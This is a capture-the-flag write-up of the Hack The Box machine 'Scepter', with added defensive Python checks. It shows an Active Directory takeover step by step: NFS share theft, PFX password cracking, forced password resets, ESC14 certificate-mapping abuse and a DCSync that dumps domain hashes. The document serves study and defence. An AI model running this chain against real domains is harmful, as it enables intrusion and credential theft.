Hackthebox: Scepter

Foued SAIDI

Overview

Scepter is a hard-difficulty machine from Hack The Box. It starts with an exposed NFS export (advertised through rpcbind) that we can mount on our own machine; it hands us keys and certificates that let us impersonate the d.baker user. We then abuse ForceChangePassword to take over a.carter, who can abuse ESC14 to get h.brown, who in turn re-abuses the same vulnerable template to land on p.adams, who has DCSync privileges.

[Image: Scepter info card]

Reconnaissance

rpcinfo shows rpcbind on port 111 advertising nfs (Network File System) and mountd on port 2049, so there is an export we can try to mount:

┌──(kali㉿kali)-[~]
└─$ rpcinfo -p 10.10.11.65
program vers proto port service
100000 2 udp 111 portmapper
100000 3 udp 111 portmapper
100000 4 udp 111 portmapper
100000 2 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 4 tcp 111 portmapper
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 tcp 2049 nfs
100005 1 tcp 2049 mountd
100005 2 tcp 2049 mountd
100005 3 tcp 2049 mountd
100005 1 udp 2049 mountd
100005 2 udp 2049 mountd
100005 3 udp 2049 mountd
100021 1 tcp 2049 nlockmgr
100021 2 tcp 2049 nlockmgr
100021 3 tcp 2049 nlockmgr
100021 4 tcp 2049 nlockmgr
100021 1 udp 2049 nlockmgr
100021 2 udp 2049 nlockmgr
100021 3 udp 2049 nlockmgr
100021 4 udp 2049 nlockmgr
100024 1 tcp 2049 status
100024 1 udp 2049 status

First we list the exports, then mount the share:

┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ sudo mount -t nfs 10.10.11.65:/helpdesk nfs_share

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ sudo su
┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# cd nfs_share

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter/nfs_share]
└─# ls
baker.crt baker.key clark.pfx lewis.pfx scott.pfx

We find baker's certificate and private key. With openssl we can bundle them into a PFX to authenticate as that user, but the private key turns out to be passphrase-protected:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter/nfs_share]
└─# openssl pkcs12 -export -out d.baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter pass phrase for baker.key:
Enter pass phrase for baker.key:
Could not find private key from -inkey file from baker.key
4087DAB95F7F0000:error:1608010C:STORE routines:ossl_store_handle_load_result:unsupported:../crypto/store/store_result.c:151:
4087DAB95F7F0000:error:07880109:common libcrypto routines:do_ui_passphrase:interrupted or cancelled:../crypto/passphrase.c:178:
4087DAB95F7F0000:error:1C80009F:Provider routines:epki2pki_decode:unable to get passphrase:../providers/implementations/encode_decode/decode_epki2pki.c:121:

So we need a password. The .pfx files in the share can be turned into a crackable hash with pfx2john, and john recovers the password of clark.pfx from rockyou:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# john -w=/usr/share/wordlists/rockyou.txt pfx_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword (clark.pfx)
1g 0:00:00:00 DONE (2025-04-22 18:57) 2.040g/s 10448p/s 10448c/s 10448C/s Liverpool..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The same password unlocks baker.key, so the PKCS#12 export now succeeds:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter/nfs_share]
└─# openssl pkcs12 -export -out ../d.baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:

The password is newpassword.

After syncing our clock with the DC (Kerberos rejects requests with too much clock skew), we use that PFX with certipy to authenticate as d.baker and retrieve his NT hash:

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# ntpdate scepter.htb
2025-04-23 03:00:43.437361 (+0000) +28805.743118 +/- 0.026259 scepter.htb 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28805.743118

┌──(root㉿kali)-[/home/kali/Hackthebox/Scepter]
└─# certipy-ad auth -pfx d.baker.pfx -dc-ip '10.10.11.65' -username 'd.baker' -domain 'scepter.htb'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

Now we can start our enumeration using bloodhound-python:

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ bloodhound-python -u 'd.baker' --hashes ':18b5fb0d99e7a475316213c15b6f22ce' -ns 10.10.11.65 -d scepter.htb -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 27S
INFO: Compressing output into 20250423032837_bloodhound.zip

In the collected data we can see that d.baker has ForceChangePassword over a.carter, so we can reset a.carter's password:

[Image: ForceChangePassword]

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ sudo ntpdate scepter.htb
2025-04-23 04:31:52.887861 (+0000) +2744.807951 +/- 0.025757 scepter.htb 10.10.11.65 s1 no-leap
CLOCK: time stepped by 2744.807951

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ getTGT.py -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in [email protected]

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ export [email protected]

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123!
[+] Password changed successfully!

Further on we see that a.carter is a member of IT Support, which has GenericAll on the STAFF ACCESS CERTIFICATE OU:

[Image: ForceChangePassword]

So first we grant a.carter GenericAll on that OU directly:

┌──(kali㉿kali)-[~/Hackthebox/Scepter]
└─$ bloodyAD -d scepter.htb -u a.carter -p Password123! --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

Then we enumerate the certificate templates with certipy; the interesting one is:

1
Template Name : StaffAccessCertificate
Display Name : StaffAccessCertificate
Certificate Authorities : scepter-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireEmail
SubjectRequireDnsAsCn
SubjectAltRequireEmail
Enrollment Flag : NoSecurityExtension
AutoEnrollment
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\staff
Object Control Permissions
Owner : SCEPTER.HTB\Enterprise Admins
Full Control Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Owner Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Dacl Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Property Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins

The StaffAccessCertificate template has both SubjectAltRequireEmail and NoSecurityExtension set. On top of that, the h.brown user has altSecurityIdentities set to {X509:h.brown@scepter.htb }, an email (RFC822) certificate mapping, which means we can perform the ESC14 attack described here: https://posts.specterops.io/adcs-esc14-abuse-technique-333a004dc2b9#4a82
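As an added defender-side example (not part of the original writeup and not certipy's own code), here is a small Python parser for certipy-style template listings like the one above, with a check for the combination that makes this template abusable: NoSecurityExtension, SubjectAltRequireEmail, a Client Authentication EKU and enrollment rights for a broad group. The sample text is a constructed copy of the listing above; the "hardened" variant and the list of privileged principal names are assumptions made for the example.

```python
import re
from typing import Dict, List

# Constructed sample: a trimmed copy of the certipy-style listing for the
# StaffAccessCertificate template shown in the writeup.
SAMPLE_TEMPLATE_TEXT = """\
Template Name : StaffAccessCertificate
Display Name : StaffAccessCertificate
Certificate Authorities : scepter-DC01-CA
Enabled : True
Client Authentication : True
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireEmail
SubjectRequireDnsAsCn
SubjectAltRequireEmail
Enrollment Flag : NoSecurityExtension
AutoEnrollment
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Authorized Signatures Required : 0
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\\staff
Object Control Permissions
Owner : SCEPTER.HTB\\Enterprise Admins
"""

# Assumed "fixed" variant: the security (SID) extension is no longer suppressed.
HARDENED_TEMPLATE_TEXT = SAMPLE_TEMPLATE_TEXT.replace(
    "Enrollment Flag : NoSecurityExtension\nAutoEnrollment", "Enrollment Flag : AutoEnrollment"
)

# Headers certipy prints between sections; they carry no value of their own.
SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}

# Assumed list of principal-name suffixes we treat as privileged enrollees.
PRIVILEGED_SUFFIXES = ("Domain Admins", "Enterprise Admins", "Local System", "Administrators")


def parse_template_listing(text: str) -> Dict[str, List[str]]:
    """Parse one template block into {field: [values]}.

    'Field : value' starts a new field; a following line without the
    ' : ' separator is a continuation value of the same field (certipy
    prints multi-valued flags and EKUs one per line).
    """
    fields: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            current = None          # a header ends any multi-line value
            continue
        m = re.match(r"^(.+?)\s*:\s*(.*)$", line)
        if m:
            current = m.group(1).strip()
            value = m.group(2).strip()
            fields[current] = [value] if value else []
        elif current is not None:
            fields[current].append(line)
    return fields


def esc14_conditions(t: Dict[str, List[str]]) -> Dict[str, bool]:
    """Each condition that, together, lets a low-privileged enrollee obtain a
    certificate whose SAN email is mapped onto another account."""
    return {
        # No SID extension: the DC must fall back to altSecurityIdentities/UPN/email mapping.
        "no_security_extension": "NoSecurityExtension" in t.get("Enrollment Flag", []),
        # SAN email is copied from the enrollee's 'mail' attribute.
        "san_email_from_mail_attr": "SubjectAltRequireEmail" in t.get("Certificate Name Flag", []),
        # The certificate is usable for PKINIT logon.
        "client_auth_eku": "Client Authentication" in t.get("Extended Key Usage", []),
        # Someone other than an admin principal may enroll.
        "broad_enrollment": any(
            not p.endswith(PRIVILEGED_SUFFIXES) for p in t.get("Enrollment Rights", [])
        ),
    }


def is_esc14_candidate(t: Dict[str, List[str]]) -> bool:
    return all(esc14_conditions(t).values())


if __name__ == "__main__":
    for label, text in (("as found", SAMPLE_TEMPLATE_TEXT), ("hardened", HARDENED_TEMPLATE_TEXT)):
        tmpl = parse_template_listing(text)
        print(f"== {label}: {tmpl['Template Name'][0]}")
        for name, hit in esc14_conditions(tmpl).items():
            print(f"  {name:26s} {'YES' if hit else 'no'}")
        print("  ESC14 candidate:", is_esc14_candidate(tmpl))
```

Running it prints the four conditions for the template as found (all YES) and for the hardened variant, where re-enabling the security extension alone is enough to drop the template out of the candidate set; tightening enrollment rights to a smaller group is the other lever the parser exposes.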

┌──(kali㉿kali)-[~]
└─$ ldapsearch -x -H ldap://scepter.htb -D '[email protected]' -w 'Password123!' -b "dc=scepter,dc=htb" "(sAMAccountName=h.brown)" altSecurityIdentities

# extended LDIF
#
# LDAPv3
# base <dc=scepter,dc=htb> with scope subtree
# filter: (sAMAccountName=h.brown)
# requesting: altSecurityIdentities
#

# h.brown, Users, scepter.htb
dn: CN=h.brown,CN=Users,DC=scepter,DC=htb
altSecurityIdentities: X509:<RFC822>[email protected]

# search reference
ref: ldap://ForestDnsZones.scepter.htb/DC=ForestDnsZones,DC=scepter,DC=htb

# search reference
ref: ldap://DomainDnsZones.scepter.htb/DC=DomainDnsZones,DC=scepter,DC=htb

# search reference
ref: ldap://scepter.htb/CN=Configuration,DC=scepter,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Now, as a.carter, we set d.baker's mail attribute to h.brown's address so that the certificate we request as d.baker carries h.brown's email in its SAN (the first request timed out, the retry succeeded), and then authenticate with it as h.brown:

┌──(kali㉿kali)-[~]
└─$ bloodyAD -d scepter.htb -u a.carter -p Password123! --host dc01.scepter.htb set object d.baker mail -v [email protected]
[+] d.baker's mail has been updated

┌──(kali㉿kali)-[~]
└─$ certipy-ad req -username "[email protected]" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

┌──(kali㉿kali)-[~]
└─$ certipy-ad req -username "[email protected]" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'

┌──(kali㉿kali)-[~]
└─$ certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=h.brown.ccache

In short: the template takes the SAN email from the enrollee's mail attribute, the issued certificate carries no SID, and h.brown's account maps certificates by email, so a certificate issued to d.baker with h.brown's email authenticates as h.brown. We can request a certificate on behalf of whichever user's email we can write into mail.
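For the blue-team side of the same mechanism, here is an added Python example (not from the original post or from any of the tools it uses) that audits altSecurityIdentities values: it classifies each mapping as strong or weak using the mapping types from Microsoft's KB5014754 guidance, and it looks for the exact condition abused above, a weak RFC822 mapping on one account whose email equals another account's mail attribute. The user records are constructed to mirror the writeup after d.baker's mail was changed; the serial number in p.adams's mapping is made up.

```python
import re
from typing import Dict, List, Optional, Tuple

# Mapping types per KB5014754: strong mappings bind a certificate to a
# specific issuer+serial, SKI or public key; weak ones bind to names only.
STRONG = {
    ("I", "SR"): "X509IssuerSerialNumber",
    ("SKI",): "X509SKI",
    ("SHA1-PUKEY",): "X509SHA1PublicKey",
}
WEAK = {
    ("I", "S"): "X509IssuerSubject",
    ("S",): "X509SubjectOnly",
    ("RFC822",): "X509RFC822",
}

# Constructed sample directory state (mirrors the writeup; serial is invented).
SAMPLE_USERS = [
    {"sam": "d.baker", "mail": "h.brown@scepter.htb", "altSecurityIdentities": []},   # tampered mail
    {"sam": "a.carter", "mail": "a.carter@scepter.htb", "altSecurityIdentities": []},
    {"sam": "h.brown", "mail": "h.brown@scepter.htb",
     "altSecurityIdentities": ["X509:<RFC822>h.brown@scepter.htb"]},
    {"sam": "p.adams", "mail": "p.adams@scepter.htb",
     "altSecurityIdentities": ["X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>1a2b3c4d"]},
]


def parse_x509_mapping(value: str) -> Optional[List[Tuple[str, str]]]:
    """Split 'X509:<TAG>val<TAG>val' into [(tag, val), ...]; None if not X509."""
    if not value.startswith("X509:"):
        return None
    return re.findall(r"<([A-Z0-9-]+)>([^<]*)", value[len("X509:"):])


def classify_mapping(value: str) -> str:
    """'strong:<type>', 'weak:<type>', 'unknown' or 'not-x509'."""
    parts = parse_x509_mapping(value)
    if parts is None:
        return "not-x509"
    tags = tuple(tag for tag, _ in parts)
    if tags in STRONG:
        return "strong:" + STRONG[tags]
    if tags in WEAK:
        return "weak:" + WEAK[tags]
    return "unknown"


def weak_mappings(users: List[Dict]) -> List[Tuple[str, str, str]]:
    """Every (sam, mapping, classification) that is a weak mapping."""
    out = []
    for u in users:
        for m in u.get("altSecurityIdentities", []):
            c = classify_mapping(m)
            if c.startswith("weak:"):
                out.append((u["sam"], m, c))
    return out


def find_email_mapping_collisions(users: List[Dict]) -> List[Tuple[str, str, str]]:
    """(impersonator, victim, email) for each RFC822 mapping on 'victim' whose
    email equals the mail attribute of a different account 'impersonator'."""
    by_mail: Dict[str, List[str]] = {}
    for u in users:
        if u.get("mail"):
            by_mail.setdefault(u["mail"].lower(), []).append(u["sam"])
    hits = []
    for victim in users:
        for m in victim.get("altSecurityIdentities", []):
            parts = parse_x509_mapping(m)
            if not parts or [tag for tag, _ in parts] != ["RFC822"]:
                continue
            email = parts[0][1].strip().lower()
            for sam in by_mail.get(email, []):
                if sam != victim["sam"]:
                    hits.append((sam, victim["sam"], email))
    return hits


if __name__ == "__main__":
    for sam, mapping, cls in weak_mappings(SAMPLE_USERS):
        print(f"WEAK  {sam:10s} {cls:24s} {mapping}")
    for who, victim, email in find_email_mapping_collisions(SAMPLE_USERS):
        print(f"ALERT {who} can authenticate as {victim} via email mapping {email}")
```

Against a real directory the same two functions run over an LDAP export of mail and altSecurityIdentities; a collision means an issued certificate for the impersonator already maps to the victim, while a weak mapping on its own is the finding to fix by replacing it with an issuer+serial, SKI or public-key mapping.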

Now checking h.brown’s permissions:

┌──(kali㉿kali)-[~]
└─$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u h.brown -k get writable --detail

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=scepter,DC=htb
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=h.brown,CN=Users,DC=scepter,DC=htb
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
altSecurityIdentities: WRITE

So h.brown can write the altSecurityIdentities attribute of p.adams.

We can do that from an evil-winrm shell:

*Evil-WinRM* PS C:\Users\h.brown\Documents> Set-ADUser -Identity "p.adams" -Add @{'altSecurityIdentities'='X509:<RFC822>[email protected]'}
*Evil-WinRM* PS C:\Users\h.brown\Documents> Get-ADUser -Identity p.adams -Properties altSecurityIdentities


altSecurityIdentities : {X509:<RFC822>[email protected]}
DistinguishedName : CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
Enabled : True
GivenName : p.adams
Name : p.adams
ObjectClass : user
ObjectGUID : a7ce1414-7b8e-41b7-9725-3686e4ed80a7
SamAccountName : p.adams
SID : S-1-5-21-74879546-916818434-740295365-1109
Surname :
UserPrincipalName : [email protected]
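The two directory writes in this chain (a.carter changing d.baker's mail, h.brown adding a mapping to p.adams) are exactly what a SOC can alert on. As an added example that is not part of the original writeup, here is Python detection logic run over constructed, simplified records of Windows Security event ID 5136 (directory service object modified); the field names follow the event's XML data items and the OperationType codes for value added/deleted are taken from the Microsoft documentation, while the approved-writer allowlist and the sample values are assumptions.

```python
import re
from typing import Dict, List

# OperationType codes in event 5136 (assumed from the Microsoft event documentation).
VALUE_ADDED = "%%14674"
VALUE_DELETED = "%%14675"

# Constructed, simplified 5136 records; the values are made up for this example.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "a.carter",
     "ObjectDN": "CN=d.baker,CN=Users,DC=scepter,DC=htb",
     "AttributeLDAPDisplayName": "mail", "AttributeValue": "h.brown@scepter.htb",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "h.brown",
     "ObjectDN": "CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb",
     "AttributeLDAPDisplayName": "altSecurityIdentities",
     "AttributeValue": "X509:<RFC822>pain@scepter.htb", "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc_idm",          # assumed IdM service account
     "ObjectDN": "CN=e.lewis,CN=Users,DC=scepter,DC=htb",
     "AttributeLDAPDisplayName": "mail", "AttributeValue": "e.lewis@scepter.htb",
     "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc_idm",
     "ObjectDN": "CN=o.scott,CN=Users,DC=scepter,DC=htb",
     "AttributeLDAPDisplayName": "telephoneNumber", "AttributeValue": "555-0100",
     "OperationType": VALUE_ADDED},
]

# Attributes that influence how a certificate (or ticket) is mapped to an account.
IDENTITY_MAPPING_ATTRS = {"altSecurityIdentities", "userPrincipalName", "mail", "servicePrincipalName"}
# Assumed allowlist of accounts that legitimately write these attributes.
APPROVED_WRITERS = {"svc_idm"}
# Weak X509 mapping tags (name-based); "<S>" does not match the strong "<SR>".
WEAK_TAGS = ("<RFC822>", "<S>")


def cn_of(dn: str) -> str:
    """First CN component of a distinguished name, '' if none."""
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else ""


def analyze_5136(events: List[Dict]) -> List[Dict]:
    """Return one alert per suspicious write to an identity-mapping attribute."""
    alerts = []
    for e in events:
        if e.get("EventID") != 5136:
            continue
        attr = e["AttributeLDAPDisplayName"]
        if attr not in IDENTITY_MAPPING_ATTRS:
            continue
        writer, value = e["SubjectUserName"], e["AttributeValue"]
        target = cn_of(e["ObjectDN"])
        reasons = []
        if attr == "altSecurityIdentities":
            op = "added" if e["OperationType"] == VALUE_ADDED else "removed"
            reasons.append(f"certificate mapping {op}")      # rare and high-value: always review
            if any(tag in value for tag in WEAK_TAGS):
                reasons.append("weak (name-based) mapping type")
        if attr == "mail" and value.split("@")[0].lower() != target.lower():
            reasons.append("mail local-part does not match the account it was written to")
        if writer not in APPROVED_WRITERS:
            reasons.append(f"written by non-approved account {writer}")
        if reasons:
            alerts.append({"writer": writer, "target": target, "attribute": attr,
                           "value": value, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in analyze_5136(SAMPLE_EVENTS):
        print(f"ALERT {a['writer']} -> {a['target']}.{a['attribute']} = {a['value']}")
        for r in a["reasons"]:
            print(f"      - {r}")
```

Event 5136 only fires if a SACL auditing "Write all properties" (or the specific attributes) is applied to the user objects, so the auditing must be in place before the detection can see anything; the routine approved write to e.lewis and the telephoneNumber change produce no alert, the two chain steps do.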

Now we repeat the earlier steps: get a TGT as d.baker, reset a.carter's password and grant GenericAll on the OU again:

┌──(kali㉿kali)-[~]
└─$ getTGT.py -dc-ip 10.10.11.65 -hashes ':18b5fb0d99e7a475316213c15b6f22ce' scepter.htb/d.baker
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Saving ticket in d.baker.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=d.baker.ccache

┌──(kali㉿kali)-[~]
└─$ bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123!
[+] Password changed successfully!
┌──(kali㉿kali)-[~]
└─$ bloodyAD -d scepter.htb -u a.carter -p Password123! --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

Now set d.baker's mail attribute to the spoofed value (pain@scepter.htb ) that matches the mapping we just added to p.adams, for another impersonation:

┌──(kali㉿kali)-[~]
└─$ bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123!' set object d.baker mail -v [email protected]
[+] d.baker's mail has been updated

Now request a new certificate for d.baker with updated mail spoof:

┌──(kali㉿kali)-[~]
└─$ certipy-ad req -username [email protected] -hashes 18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'

┌──(kali㉿kali)-[~]
└─$ certipy-ad auth -pfx 'd.baker.pfx' -domain 'scepter.htb' -username 'p.adams'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0

Now we can see that p.adams is a member of REPLICATION OPERATORS:

[Image: BloodHound]

So we can DCSync with that account and dump the domain credentials, including the Administrator hash:

┌──(kali㉿kali)-[~]
└─$ secretsdump.py -k DC01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
